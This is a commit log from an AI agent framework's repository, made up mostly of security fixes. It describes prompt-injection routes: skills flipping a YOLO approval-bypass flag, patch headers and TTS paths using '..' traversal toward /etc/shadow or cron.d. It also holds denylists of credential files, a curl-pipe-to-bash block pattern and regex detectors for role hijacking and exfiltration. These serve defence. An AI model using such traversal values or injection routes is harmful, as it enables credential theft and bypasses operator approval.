Teknium	a989a79c0c	fix(gateway): allow native delivery of freshly-produced agent files (#32060 ) The gateway's media delivery allowlist required files live inside `~/.hermes/cache/{documents,images,...}`, which is the wrong shape for real agent usage. Agents naturally produce artifacts via terminal tools (`pandoc -o /tmp/report.pdf`, `matplotlib savefig`, etc.) or write_file into project directories — these never land under the cache. Result: users got a raw file path in chat instead of an attachment. This is doubly bad in deployment shapes where the cache directories aren't writable by the agent at all: Hermes running in Docker with a read-only mount, or with a Docker/Modal/SSH terminal backend whose filesystem isn't the gateway host's filesystem. Layered trust model: 1. Cache-dir allowlist (unchanged) — Hermes-managed roots always trusted. 2. Operator allowlist — `HERMES_MEDIA_ALLOW_DIRS` env var, now also surfaced as `gateway.media_delivery_allow_dirs` in config.yaml. 3. Recency-based trust (new, default on) — files whose mtime is within `gateway.trust_recent_files_seconds` (default 600s) of "now" are trusted even outside the cache/operator allowlist. Old host files (`/etc/passwd`, `~/.bashrc`, `~/.ssh/id_rsa`) have mtimes measured in days/months, well outside the window — prompt-injection paths pointing at pre-existing files are still rejected. 4. Hard denylist — `/etc`, `/proc`, `/sys`, `/dev`, `/root`, `/boot`, `/var/{log,lib,run}`, plus `$HOME/.{ssh,aws,gnupg,kube,docker,config, azure,gcloud}` and `Library/Keychains`. Denylist blocks delivery even when recency would trust the file, in case an attacker somehow refreshes a sensitive file's mtime. Operators who want strict-allowlist behavior set `gateway.trust_recent_files: false` and the system reverts to pre-existing behavior. Tests: 6 new cases in test_platform_base.py cover the recency window, disabled mode, system-path denylist, and the motivating PDF-in-project scenario. 3 existing tests (test_platform_base, test_tts_media_routing, test_send_message_tool) that exercised the strict-allowlist path are updated to disable recency trust explicitly. E2E validation: real `validate_media_delivery_path()` accepts fresh PDFs in /tmp and project dirs, rejects /etc/passwd, ~/.ssh/id_rsa, and files older than the window; config.yaml `gateway.*` keys bridge correctly to the env vars the validator reads.	2026-05-25 05:34:31 -07:00
Teknium	0ff7c09e2f	feat(mcp-oauth): stdin paste-back fallback for headless OAuth flow (#32053 ) When the user runs OAuth on a remote/SSH machine without a port forward, the OAuth provider redirects to http://127.0.0.1:<port>/callback which only the listener on the remote machine can receive — the user's browser on another box just shows a connection error. _wait_for_callback() now races the HTTP listener against a stdin reader on interactive TTYs. The user can copy the URL from the browser's address bar after authorization (which contains code=...&state=...) and paste it back at the prompt. Whichever fills the result dict first wins; the HTTP listener remains the primary path for local sessions and SSH tunnels. Accepts any of: - Full local redirect URL: http://127.0.0.1:N/callback?code=...&state=... - Provider URL after redirect: https://mcp.linear.app/callback?code=...&state=... - Just the query string: ?code=...&state=... or code=...&state=... The paste thread only spawns when _is_interactive() is true, preserving the existing 'no input() in headless runs' invariant — verified by TestWaitForCallbackPasteIntegration.test_paste_prompt_NOT_shown_when_noninteractive. The SSH-session hint in _redirect_handler is updated to surface the paste option as the primary remedy, with ssh -L tunneling as the alternative.	2026-05-25 05:20:05 -07:00
aaronlab	5f20322d23	fix(tts): reject '..' traversal in output_path text_to_speech_tool accepts an explicit output_path. Without a traversal guard, a path containing '..' components (whether prompt-injection- controlled, from a confused skill, or just a buggy caller) could escape its declared base and write the audio to a system location — e.g. `output_path='audio/../../etc/cron.d/x'` lands the file outside the intended audio cache. Reject '..' components in the user-supplied path. Explicit absolute paths are unchanged (the agent legitimately writes audio wherever the user/caller asks); only traversal-style escapes are blocked. The terminal tool can still write anywhere with approval — this just keeps the unattended TTS surface from materializing files via traversal. Regression tests cover: '..' in the middle (audio/../../etc/...), bare '..' prefix, and the negative cases (absolute paths + relative paths without '..' both pass through unchanged). Salvaged from PR #6693 by @aaronlab. The original PR confined output to DEFAULT_OUTPUT_DIR-or-cwd, which broke 9 existing tests that legitimately write to tmp_path locations. The traversal-only check covers the actual threat (path-escape via '..' from prompt injection) without restricting where users can choose to write their audio. The remaining pieces of #6693 (skill_commands rglob symlink rejection, delegate_tool batch prefix display) are dropped: - skill_commands rglob: breaks the documented design supporting ~/.hermes/skills/<name> as a symlink to a checked-out skill elsewhere (see comment at agent/skill_commands.py:73-75) - delegate_tool batch prefix: pure UX, doesn't belong in a security PR Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>	2026-05-25 05:15:55 -07:00
Teknium	79799c80f5	test(approval): patch _YOLO_MODE_FROZEN directly in test_yolo_overrides_cron_deny The test set HERMES_YOLO_MODE=1 via monkeypatch.setenv, expecting check_dangerous_command() to honor yolo and bypass cron_mode=deny. But tools.approval._YOLO_MODE_FROZEN is intentionally frozen at module import time (security: prevents prompt-injection runtime escalation). When CI imports the module BEFORE the test sets the env, the frozen value stays False and the yolo bypass never activates. Local runs missed this because the conftest leaked a non-empty HERMES_YOLO_MODE into the import-time env. CI's clean-env path exposed the bug deterministically on test (3) / test (4) shards. Fix: patch the module attribute directly via mock.patch.object so the test simulates process-startup-with-yolo regardless of import order. The behavior under test (yolo bypasses cron_mode=deny for non-hardline commands) is unchanged; the security invariant (_YOLO_MODE_FROZEN can't be set at runtime by skills) is preserved. Reproduced locally with: env -i HOME=$HOME PATH=$PATH python3 -m pytest tests/tools/test_cron_approval_mode.py -o 'addopts=' -v Without the fix: 1 failed, 23 passed. With the fix: 24 passed.	2026-05-25 05:07:49 -07:00
Peter	95848b1cbc	fix(transcription): reject symlinked audio inputs (#10082 ) * fix(transcription): reject symlinked audio inputs Validation runs before provider selection, so rejecting symbolic-link paths there prevents supported-extension links from being treated as normal audio files. Use os.path.islink to avoid perturbing the existing Path.stat error path and to reject links before resolving targets. Constraint: Keep validation platform-safe and avoid requiring symlink support where unavailable. Rejected: Use Path.is_symlink \| it consumes pathlib stat calls and broke the existing stat error regression. Confidence: high Scope-risk: narrow Directive: Keep path hardening in _validate_audio_file before provider dispatch. Tested: source venv/bin/activate && python -m pytest tests/tools/test_transcription_tools.py::TestValidateAudioFileEdgeCases -q (5 passed) Tested: source venv/bin/activate && python -m pytest tests/tools/test_transcription_tools.py::TestValidateAudioFileEdgeCases tests/tools/test_transcription_tools.py::TestTranscribeAudioDispatch::test_invalid_file_short_circuits -q (6 passed) Tested: source venv/bin/activate && python -m compileall tools/transcription_tools.py tests/tools/test_transcription_tools.py Tested: git diff --check Not-tested: Full tests/tools/test_transcription_tools.py under .[dev] only; existing faster_whisper optional dependency tests fail with ModuleNotFoundError. * Keep transcription tests independent of optional whisper install The transcription suite mocks faster-whisper directly, so a minimal test stub keeps the branch verifiable in environments where the optional package is not installed. This preserves the existing mock-based coverage without adding a dependency. Constraint: faster-whisper is an optional local STT dependency and is absent from the current validation environment Rejected: Install faster-whisper just for branch validation \| would add heavyweight environment coupling outside the patch scope Confidence: high Scope-risk: narrow Directive: Keep this as a test-only stub unless production import semantics change Tested: pytest tests/tools/test_transcription_tools.py -q --------- Co-authored-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>	2026-05-25 05:07:45 -07:00
Peter	ee59ef1946	fix: reject read_file symlinks to blocking devices (#10133 ) * fix: reject read_file symlinks to blocking devices The read_file guard already refused direct device paths such as /dev/zero, but a workspace symlink resolving to one of those devices could still reach the shell-backed read path and hang on wc/head/sed. Keep the literal alias check and add a resolved-path pass so local symlinks to blocked device/fd endpoints are rejected before I/O. Constraint: Preserve literal /dev/stdin handling before terminal-specific realpath resolution Confidence: high Scope-risk: narrow Tested: pytest tests/tools/test_file_read_guards.py tests/tools/test_file_tools.py -q; python -m compileall tools/file_tools.py tests/tools/test_file_read_guards.py; git diff --check Signed-off-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com> * Keep file guard tests off sensitive macOS temp paths The branch now inherits a sensitive-path write guard from upstream main. On macOS, tempfile.mkdtemp() resolves under /private/var/folders, so the new write-path guard fired before the file read dedup assertions could exercise their intended behavior. The tests now create their scratch files inside the worktree temp checkout, outside those system-sensitive prefixes, without changing production behavior. Constraint: Rebased branch must pass the expanded file read guard suite on macOS. Rejected: Loosen the production sensitive-path prefix list \| broader behavior change unrelated to this PR. Confidence: high Scope-risk: narrow Tested: pytest tests/tools/test_file_read_guards.py -q --------- Signed-off-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com> Co-authored-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>	2026-05-25 05:07:38 -07:00
Dakota Secula-Rosell	b7b8bec800	fix(security): block /proc//environ, cmdline, maps from file read (#4609 ) The read_file tool and terminal cat can access /proc/self/environ to recover all process env vars including secrets stripped by the subprocess blocklist. Output redaction partially mitigates (catches known-format tokens) but misses custom/proprietary key formats, especially when values are printed without their key names. Add /proc//environ, /proc//cmdline, and /proc//maps to the blocked device paths in _is_blocked_device(): - /proc//environ: leaks full process env (API keys, tokens) - /proc//cmdline: leaks command-line args (may contain passwords) - /proc/*/maps: leaks memory layout (ASLR bypass for exploitation) Legitimate /proc reads (cpuinfo, meminfo, uptime, version) remain accessible — the check only blocks per-pid pseudo-files with known sensitive suffixes. Complements PR #4432 (PID namespace isolation for child processes) which prevents children from reading the parent's /proc, but does not prevent the parent process itself from being read via file tools. Partially addresses #4427 Changes: tools/file_tools.py \| +6 tests/tools/test_file_read_guards.py \| +18 -1 Co-authored-by: dsr-restyn <dsr-restyn@users.noreply.github.com>	2026-05-25 05:07:31 -07:00
Rodrigo	4cb3eb03c7	fix(approval): harden YOLO bypass, LLM parsing, auto-approve audit, pipe pattern (#23835 ) * fix(approval): harden YOLO bypass, LLM parsing, auto-approve audit, pipe pattern - BUG-009 (CRITICAL): freeze HERMES_YOLO_MODE at module import via _YOLO_MODE_FROZEN; prevents skills/prompt-injection from calling os.environ["HERMES_YOLO_MODE"]="true" at runtime to bypass all checks - BUG-002 (HIGH): replace substring "APPROVE" in answer with exact answer == "APPROVE" in _smart_approve; prompt already requests exactly one word, substring match was exploitable via verbose LLM responses - BUG-001 (MEDIUM): add logger.warning for every dangerous command that auto-approves in non-interactive non-gateway context; makes silent approvals visible in audit logs without breaking script behavior - BUG-008 (LOW): expand curl/wget pipe pattern to cover \| /bin/bash and \| bash -c variants, not just \| sh / \| bash Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * fix(approval): add missing is_truthy_value import + fix yolo test patches _YOLO_MODE_FROZEN uses is_truthy_value() from utils — import was missing. Tests that set HERMES_YOLO_MODE via monkeypatch.setenv() no longer work because the value is frozen at import time; update them to patch the module-level flag directly via monkeypatch.setattr(). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-05-25 03:35:33 -07:00
waefrebeorn	5faea3f618	fix(file_tools): reject '..' traversal in V4A patch headers V4A patch '* Update File:', '* Add File:', '* Delete File:' headers come from patch CONTENT, not the explicit `path=` argument. That makes them attacker-influenceable through skill content, web extract output, prompt injection, and other surfaces the agent processes. Headers like '* Update File: ../../../etc/shadow' would resolve relative to the agent's cwd; in deployment configurations where that cwd is deep enough to land outside Hermes' protected paths, the write could land somewhere the agent operator did not intend. Reject any V4A header containing a '..' path component before applying the patch. The explicit `path=` argument on patch_tool is UNCHANGED — the agent legitimately uses '..' there (e.g. `patch path='../other_module/x.py'` from a worktree dir is normal cross-module editing). Regression tests: V4A Update header with traversal rejected, V4A Add header with traversal rejected, patch_v4a never invoked when rejection fires. Salvaged from PR #29395 by @waefrebeorn. The original PR added has_traversal_component as a blanket reject on read_file_tool, write_file_tool, patch_tool's explicit path, and search_tool — that would break legitimate agent operation where '..' is normal. Also dropped the over-eager skills_guard pattern additions (pickle.loads/marshal.loads/ctypes.CDLL/importlib at high/critical severity would false-positive on legit data-science and FFI skills). Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>	2026-05-25 01:55:59 -07:00
AdamPlatin123	00bd24e27c	fix(security): expand memory content scanning patterns to parity with skills guard (#9151 ) Expand _MEMORY_THREAT_PATTERNS from 13 to 24 regex patterns and align _INVISIBLE_CHARS with skills_guard.py (10 → 17 characters). Key changes: - Add multi-word bypass prevention (?:\w+\s+)* to injection patterns - Add missing injection patterns: role_pretend, leak_system_prompt, remove_filters, fake_update, translate_execute, html_comment_injection, hidden_div - Add exfiltration patterns: send_to_url, context_exfil - Add persistence patterns: agent_config_mod, hermes_config_mod (both require modification-verb prefix to avoid false positives on mere mentions of config filenames) - Add hardcoded secret detection pattern - Add role_hijack precision fix: require article after "now" to avoid blocking "you are now ready/connected/set up" etc. - Expand invisible unicode set with directional isolates (U+2066-2069) and invisible math operators (U+2062-2064) Test coverage expanded from ~8 to ~30 scan tests including dedicated false-positive regression tests for all precision-sensitive patterns. Known limitations (deferred to follow-up PRs): - prompt_builder.py and cronjob_tools.py still use older pattern sets - No semantic/LLM-based scanning (regex-only approach) - No cross-entry or cross-store analysis	2026-05-25 01:51:53 -07:00
Edward-x	7ebebfbb8d	Harden Skills Guard multi-word prompt patterns (#26852 ) Co-authored-by: openhands <openhands@all-hands.dev>	2026-05-25 01:51:27 -07:00
Jorge Fuenmayor	93660643a6	fix: harden skill trust source matching (#31229 ) Co-authored-by: gaia <gaia@gaia.local>	2026-05-25 01:51:15 -07:00
teknium1	d3ffbc6409	feat(stt): add stt.providers.<name> command-provider registry Mirror of the TTS command-provider registry (PR #17843) for STT. Lets any shell-driven ASR engine — Doubao ASR, NVIDIA Parakeet, whisper.cpp builds, SenseVoice, curl pipelines — become an STT backend with zero Python. Complements the legacy HERMES_LOCAL_STT_COMMAND escape hatch (preserved untouched via the built-in local_command path) and the register_transcription_provider() Python plugin hook also shipped in this PR. Resolution order (mirrors TTS exactly): 1. Built-in (local, local_command, groq, openai, mistral, xai) → native handler. Always wins. 2. stt.providers.<name>: type: command → command-provider runner. 3. Plugin-registered TranscriptionProvider → plugin dispatch. 4. No match → 'No STT provider available'. Files ----- - tools/transcription_tools.py: BUILTIN_STT_PROVIDERS frozenset retained; added _resolve_command_stt_provider_config, _transcribe_command_stt, and local helpers for template rendering, shell-quote context, and process-tree termination. Helpers are documented as mirrors of their tts_tool.py counterparts (kept local to avoid cross-tool private import). Wire-in is one insertion point in transcribe_audio() after the xai elif and before the plugin dispatcher. Plugin dispatcher additionally defensively short-circuits when a same-name command config exists (command-wins-over-plugin invariant). - tests/tools/test_transcription_command_providers.py: 50 new tests covering resolution (builtin precedence, type/command gating, case-insensitive lookup, legacy stt.<name> back-compat), helpers (timeout fallback, format validation, iter, has-any), template rendering (shell-quote contexts, doubled-brace preservation), end-to-end via _transcribe_command_stt (output_path read, stdout fallback, timeout, nonzero exit envelope, model override, language precedence), and dispatcher integration via the real transcribe_audio() including command-wins-over-plugin and builtin-shadow-rejection. - tests/plugins/transcription/check_parity_vs_main.py: extended from 10 to 13 scenarios. New cases: command-provider-installed, command-vs-plugin-same-name (verifies command wins precedence), explicit-openai-with-command-shadow (verifies built-in wins). Adds command_provider dispatch_kind detection via transcript prefix (CMD: vs PLUGIN:) so command-provider scenarios can be distinguished from plugin scenarios even when sharing a provider name. - website/docs/user-guide/features/tts.md: new 'STT custom command providers' section symmetric to the TTS section — example config, placeholder grammar table (input_path / output_path / output_dir / format / language / model), transcript-read-back semantics (file first, then stdout fallback), optional keys table, behavior notes, security note. Updated 'Python plugin providers (STT)' to include the new 'When to pick which (STT)' decision table and updated resolution-order section (now 4 layers instead of 3). Verification ------------ 189/189 STT targeted tests + 50/50 new command-provider tests pass. Combined sweep: tests/tools/ 5576/5576, tests/agent/ + tests/hermes_cli/ 8623/8623 — zero regressions across 14,199 tests. Parity harness: 13 scenarios, 9 OK + 4 expected diffs (no_provider_error → plugin, plugin_unavailable, command_provider × 2). E2E live-verified in an isolated HERMES_HOME with a real .wav file: command: → dispatched to stt.providers.my-fake-cli plugin: → dispatched to registered TranscriptionProvider command-wins-over-plugin: → command provider beats same-name plugin builtin-wins-over-command: → built-in OpenAI handler fires; stt.providers.openai: type: command does NOT hijack it.	2026-05-25 01:41:19 -07:00
kshitijk4poor	2cd952e110	feat(stt): add register_transcription_provider() plugin hook Add an opt-in Python plugin surface for speech-to-text backends, mirroring the TTS hook pattern. New backends (OpenRouter, SenseAudio, Gemini-STT, custom proprietary engines) can be implemented as plugins without modifying tools/transcription_tools.py. Built-ins always win -------------------- The 6 built-in STT providers (local/faster-whisper, local_command, groq, openai, mistral, xai) keep their native handlers. Plugins attempting to register under a built-in name are rejected at registration time with a warning and re-checked defensively at dispatch. Resolution order ---------------- 1. stt.provider matches a built-in → built-in dispatch (unchanged) 2. stt.provider matches a registered plugin → a. if plugin.is_available() returns False → unavailability envelope identifying the plugin (not the generic "No STT provider" message — the user explicitly opted into this plugin) b. otherwise plugin.transcribe() with model + language forwarded from stt.<provider>.{model,language} config 3. No match → legacy "No STT provider available" error (unchanged) Per-provider config namespace ----------------------------- Plugins read their config from stt.<provider> in config.yaml, mirroring how built-ins read stt.openai.model / stt.mistral.model. The dispatcher forwards `model` and `language` from this section. Caller's explicit `model=` argument overrides the config-set model. Files ----- - agent/transcription_provider.py: TranscriptionProvider ABC - agent/transcription_registry.py: register/get/list providers, built-in shadow guard, _reset_for_tests - hermes_cli/plugins.py: register_transcription_provider() on PluginContext - tools/transcription_tools.py: BUILTIN_STT_PROVIDERS frozenset, _dispatch_to_plugin_provider() with availability gate, wire-in after xai branch and before "No STT provider" error - tests/agent/test_transcription_registry.py: 27 tests - tests/hermes_cli/test_plugins_transcription_registration.py: 3 tests - tests/tools/test_transcription_plugin_dispatch.py: 28 tests (covering built-in short-circuit, plugin dispatch, exception envelope, non-dict guard, availability gate, language forwarding) - tests/plugins/transcription/check_parity_vs_main.py: 10-scenario subprocess-pinned parity harness vs origin/main - website/docs/user-guide/features/{tts,plugins}.md: docs Behavior parity --------------- 10 scenarios, 8 OK + 2 expected DIFFs: no_provider_error → plugin (plugin-installed scenario) no_provider_error → plugin_unavailable (plugin-installed-unavailable scenario; PR returns cleaner envelope) Zero behavior change for users not opting into a plugin. Issue follow-up to #30398.	2026-05-25 01:41:19 -07:00
Ben Barclay	7e165e843d	Merge pull request #31760 from NousResearch/hermes/hermes-bf5898da feat(docker)!: s6-overlay container supervision (salvage of #30136)	2026-05-25 12:57:51 +10:00
Ben	7d54288d82	test(dockerfile): recognize s6-overlay/init as a valid PID-1; harden against historical-comment masquerade PR #30136 CI: test_dockerfile_entrypoint_routes_through_the_init failed because the test hardcoded known_inits = ('tini', 'dumb-init', 'catatonit'). The PR replaced tini with s6-overlay's /init (which execs s6-svscan as PID 1) — same SIGCHLD-reaping contract, different name, so the substring scan against ENTRYPOINT missed it. Two-part fix: 1. Extend the accepted token list to include 's6-overlay', 's6-svscan', and '/init'. The contract these tests enforce is behavioural ('some PID-1 init reaps SIGCHLD'), so the names list is purely a recognition table and any reaper-capable family should qualify. 2. Harden test_dockerfile_installs_an_init_for_zombie_reaping (the sibling check) against comment-only matches. It was scanning the full Dockerfile text and only passed because the word 'tini' is still in a historical comment explaining why we used to use it. The next person to clean up that comment would have silently broken the test. New _instruction_text() helper joins only the parsed, non-comment Dockerfile instructions so stale comments can't satisfy the check. (cherry picked from commit `ffc1bb6393`)	2026-05-25 12:24:58 +10:00
teknium1	7f6f00f6ec	test(dockerfile): accept s6-overlay /init as a known PID-1 init Follow-up to @benbarclay's #30136 salvage. The pre-existing PID-1 contract tests in tests/tools/test_dockerfile_pid1_reaping.py (added with #15012) hardcoded tini/dumb-init/catatonit as the only accepted inits, so they failed after #30136 replaced tini with s6-overlay's /init. s6-overlay's PID 1 is s6-svscan, which reaps zombies non-blockingly on SIGCHLD — same contract the test exists to enforce. Two updates: * test_dockerfile_installs_an_init_for_zombie_reaping — accept 's6-overlay' as a known-installed marker (matches the s6-overlay install layer in Ben's Dockerfile). * test_dockerfile_entrypoint_routes_through_the_init — accept '/init' as a known-routed marker (s6-overlay's PID-1 binary lives at /init by convention). Both assertions still fire if a future Dockerfile rewrite drops the init entirely. Local: 7/7 pass.	2026-05-24 18:32:14 -07:00
kshitijk4poor	af973e4071	refactor(gateway): migrate Mattermost adapter to bundled plugin Second migration of an existing built-in platform adapter after Discord (PR #30591) — follows the same shape established by IRC / Teams / LINE / Google Chat / SimpleX and the playbook in `references/platform-plugin-migration.md`. Advances the umbrella refactor in #3823. Matches Discord's parity bar — adapter under `plugins/platforms/mattermost/` with the standard `__init__.py` / `adapter.py` / `plugin.yaml` shell, `register(ctx)` entry point, no back-compat shim at the old import path, and full parity for all five hooks Discord uses plus the `apply_yaml_config_fn` hook (mattermost is the second consumer of #25443 after Discord): * `standalone_sender_fn` — out-of-process cron delivery via Mattermost REST API. Picks up the thread_id + media_files capabilities the legacy `_send_mattermost` lacked (parity with Discord's `_standalone_send`). * `setup_fn` — interactive `hermes setup gateway` wizard. * `apply_yaml_config_fn` — translates `config.yaml` `mattermost:` keys (`require_mention`, `free_response_channels`, `allowed_channels`) into `MATTERMOST_` env vars (replaces the hardcoded block in `gateway/config.py`). `is_connected` — declares connection state from `MATTERMOST_TOKEN` + `MATTERMOST_URL`. * `check_fn` — verifies aiohttp is installed and both required env vars are set. * plus `allowed_users_env`, `allow_all_env`, `cron_deliver_env_var`, `max_message_length` (4000 — Mattermost practical limit), `emoji`, `required_env`, `install_hint`. Files ----- * `gateway/platforms/mattermost.py` (873 LOC) → `plugins/platforms/mattermost/adapter.py` (git rename, R071) + appended `register()` block, hook helpers, and `_standalone_send` with media upload + thread_id support. * New `plugins/platforms/mattermost/{__init__.py, plugin.yaml}` with `requires_env` / `optional_env` declarations covering MATTERMOST_URL, MATTERMOST_TOKEN, MATTERMOST_ALLOWED_USERS, MATTERMOST_ALLOW_ALL_USERS, MATTERMOST_HOME_CHANNEL, MATTERMOST_REPLY_MODE, MATTERMOST_REQUIRE_MENTION, MATTERMOST_FREE_RESPONSE_CHANNELS, MATTERMOST_ALLOWED_CHANNELS. * `gateway/config.py`: delete 17-LOC `mattermost_cfg` YAML→env bridge (moved into plugin's `_apply_yaml_config`). * `gateway/run.py::_create_adapter`: delete `Platform.MATTERMOST elif` — replaced by the existing generic plugin-registry-first dispatch. * `tools/send_message_tool.py`: delete `_send_mattermost` (22 LOC) + `Platform.MATTERMOST elif` in `_send_to_platform` — the `else` branch already routes plugin platforms through `_send_via_adapter`, which hits the registry's `standalone_sender_fn`. * `hermes_cli/setup.py`: delete `_setup_mattermost` (44 LOC) — replaced by the plugin's `interactive_setup`. * `hermes_cli/gateway.py`: delete `_PLATFORMS["mattermost"]` dict entry (3 LOC) — plugin's `setup_fn` is dispatched via the plugin path in `_configure_platform`. * Consumer rewrite: 5 test files (test_mattermost.py, test_media_download_retry.py, test_send_multiple_images.py, test_stream_consumer.py, test_ws_auth_retry.py) get `gateway.platforms.mattermost` → `plugins.platforms.mattermost.adapter` with the bulk-rewrite recipe from the platform-plugin-migration playbook. Single `mock.patch` string in test_stream_consumer.py also repointed. * `tests/tools/test_send_message_missing_platforms.py`: thin `(token, extra, chat_id, message)` compat shim around the plugin's `_standalone_send(pconfig, …)` so existing test bodies continue to work without rewriting every signature. Validation ---------- * Plugin discovery: mattermost registers from `plugins/platforms/mattermost/` alongside discord / teams / irc / line / google_chat / simplex. All 9 hooks present (setup_fn, standalone_sender_fn, apply_yaml_config_fn, is_connected, check_fn, allowed_users_env, allow_all_env, cron_deliver_env_var, max_message_length=4000). * Mattermost-touching tests: 62/62 pass (`test_mattermost.py` + `test_send_message_missing_platforms.py`). * Targeted selectors (mattermost or platform_registry or stream_consumer or ws_auth_retry or media_download_retry or send_multiple_images or send_message_tool or platform_connected): 433/433 pass. * Full sweep (`scripts/run_tests.sh tests/gateway/ tests/cron/ tests/tools/test_send_message_tool.py tests/tools/test_send_message_missing_platforms.py tests/integration/`): 6220/6220 pass in 47.8s, 0 failures. * Lint: ruff clean on all touched files. * Git identity verified: kshitijk4poor. * Rename detection: R071 (similarity dropped from a hypothetical R09x by the ~320-line appended register block — ~36% growth over the 873-LoC base, vs Discord's 5101 LoC base which kept R091). Closes part of #3823.	2026-05-24 18:05:33 -07:00
Ben	4b4c36cb61	feat(docker): remove gosu from bundled image; s6-setuidgid handles privilege drop The s6-overlay migration replaced every runtime use of gosu with s6-setuidgid (in stage2-hook.sh, main-wrapper.sh, per-service run scripts, and cont-init.d hooks), but the gosu binary itself was still being copied into the image from tianon/gosu, and several comments across the repo still pointed to it. Image changes: - Drop the FROM tianon/gosu:1.19-trixie AS gosu_source stage - Drop the COPY --from=gosu_source /gosu /usr/local/bin/ layer - Net: one fewer base-image pull, ~12-15 MB layer eliminated Documentation/comment refresh (no behavior change): - Dockerfile: update root-user rationale comment + cont-init.d comment - docker/main-wrapper.sh: drop "pre-s6 contract (gosu drop)" reference - docker-compose.yml: update UID/GID remap comment - .hadolint.yaml: update DL3002 ignore rationale - website/docs/user-guide/docker.md: privilege-drop helper is s6-setuidgid now - hermes_cli/config.py: docker_run_as_host_user docstring tools/environments/docker.py runs arbitrary user images via the terminal backend, not the bundled Hermes image. It still needs SETUID/ SETGID caps so user images that use gosu/su/s6-setuidgid all work. Renamed the cap-list constant _GOSU_CAP_ARGS → _PRIVDROP_CAP_ARGS and updated comments to list s6-setuidgid alongside the others as examples. The matching test (test_security_args_include_setuid_setgid_for_gosu_drop → test_security_args_include_setuid_setgid_for_privdrop) was renamed and its docstring updated; behavior is unchanged. Verification: - hadolint clean against .hadolint.yaml - shellcheck clean against all docker/ shell scripts - Image rebuilt successfully (sha 1a090924ccea) - Docker harness: 19 passed in 41.87s (every Phase 0 test + Phase 4 per-profile-gateway lifecycle + container-restart reconciliation) - tests/tools/test_docker_environment.py: 23 passed (rename did not break test discovery; pre-existing unrelated mock warning) The plan document (docs/plans/2026-05-07-s6-overlay-dynamic-subagent-gateways.md) intentionally retains its historical references to gosu — it describes the pre-s6 entrypoint as background for understanding the migration.	2026-05-24 18:05:33 -07:00
kshitijk4poor	00ec0b617c	feat(tts): add register_tts_provider() plugin hook (closes #30398 ) Adds a `TTSProvider(ABC)` + `register_tts_provider()` extension point to the plugin context API, alongside the existing config-driven `tts.providers.<name>: type: command` registry from PR #17843. This is additive — the command-provider surface stays as the primary way to add a TTS backend. The hook covers cases the shell-template grammar can't reasonably express: - Native Python SDKs without a CLI (Cartesia, Fish Audio, etc.) - Streaming synthesis (chunked Opus → voice-bubble delivery) - Voice metadata API for the `hermes tools` picker - OAuth-refreshing auth flows None of the 10 inline built-in providers (`edge`, `openai`, `elevenlabs`, `minimax`, `gemini`, `mistral`, `xai`, `piper`, `kittentts`, `neutts`) are migrated to plugins. They stay inline. The hook is for new engines that aren't built-in. ## Resolution order The dispatcher's resolution order is the load-bearing invariant: 1. `tts.provider` is a built-in name → built-in dispatch. Always wins. 2. `tts.provider` matches `tts.providers.<name>` with `command:` set → command-provider dispatch (PR #17843). 3. `tts.provider` matches a plugin-registered `TTSProvider` → plugin dispatch (new). 4. No match → falls through to Edge TTS default (legacy behavior). Built-ins-always-win is enforced at THREE layers: - Registry: `register_provider()` rejects shadowing names with a warning. - Dispatcher: `_dispatch_to_plugin_provider()` short-circuits built-in names defensively before consulting the registry. - Picker: `_plugin_tts_providers()` filters built-in shadows out of the `hermes tools` row list defensively. Command-providers-win-over-plugins is enforced at TWO layers: - The caller in `text_to_speech_tool` checks `_resolve_command_provider_config` first. - `_dispatch_to_plugin_provider` re-checks for a same-name command config defensively so a refactor of the caller can't silently break the invariant. ## New files - `agent/tts_provider.py` — `TTSProvider(ABC)` with `synthesize()` (required), `list_voices()`, `list_models()`, `get_setup_schema()`, `stream()`, `voice_compatible` (all optional with sane defaults). Mirrors `agent/image_gen_provider.py` shape. - `agent/tts_registry.py` — `register_provider`/`get_provider`/`list_providers` with `_BUILTIN_NAMES` reject-shadowing invariant. Mirrors `agent/image_gen_registry.py` shape. - `plugins/tts/...` directory ready for community plugins (none shipped). ## Modified files - `hermes_cli/plugins.py` — `register_tts_provider()` method on `PluginContext`. Matches the gating shape of `register_image_gen_provider()` / `register_browser_provider()`. - `tools/tts_tool.py` — `_dispatch_to_plugin_provider()` + `_plugin_provider_is_voice_compatible()` + walrus-elif wiring into the main dispatcher. Built-in elif chain untouched. - `hermes_cli/tools_config.py` — `_plugin_tts_providers()` injects plugin rows into the Text-to-Speech picker category alongside the 10 hardcoded built-in rows. ## Tests - `tests/agent/test_tts_registry.py` — 47 tests covering registration, lookup, ABC contract, helpers, AND a `TestBuiltinSync` regression test that fails if `agent.tts_registry._BUILTIN_NAMES` drifts from `tools.tts_tool.BUILTIN_TTS_PROVIDERS` (kept duplicated due to circular import constraints). - `tests/tools/test_tts_plugin_dispatch.py` — 35 tests covering built-in-always-wins, command-wins-over-plugin, plugin dispatch, exception passthrough, voice_compatible helper. - `tests/hermes_cli/test_tts_picker.py` — 10 tests covering the picker surface, builtin shadowing defense, integration with `_visible_providers`. - `tests/hermes_cli/test_plugins_tts_registration.py` — 3 end-to-end tests via `PluginManager.discover_and_load()`. - `tests/plugins/tts/check_parity_vs_main.py` — 9-scenario subprocess parity harness vs `origin/main`. The only intentional diff is `fallback_edge → plugin` for the `plugin-installed` scenario. ## Verification - 95/95 new tests pass. - 170/170 pre-existing TTS tests (test_tts_command_providers, test_tts_max_text_length, test_tts_speed, etc.) pass unchanged. - Parity harness against `origin/main`: 8 OK + 1 expected DIFF. - E2E smoke: a registered plugin's `synthesize()` is called via `text_to_speech_tool` with the standard JSON envelope returned. - Ruff clean on all touched files. ## Docs - `website/docs/user-guide/features/tts.md` — new "Python plugin providers" section with a decision table (command-provider vs plugin), minimal plugin example, and the optional-hook reference. - `website/docs/user-guide/features/plugins.md` — TTS row updated to mention both surfaces (command-provider primary, plugin for SDK/streaming). Closes #30398	2026-05-24 18:04:54 -07:00
kronexoi	4694524dee	fix(security): restrict write access to Anthropic OAuth credential store	2026-05-24 17:47:24 -07:00
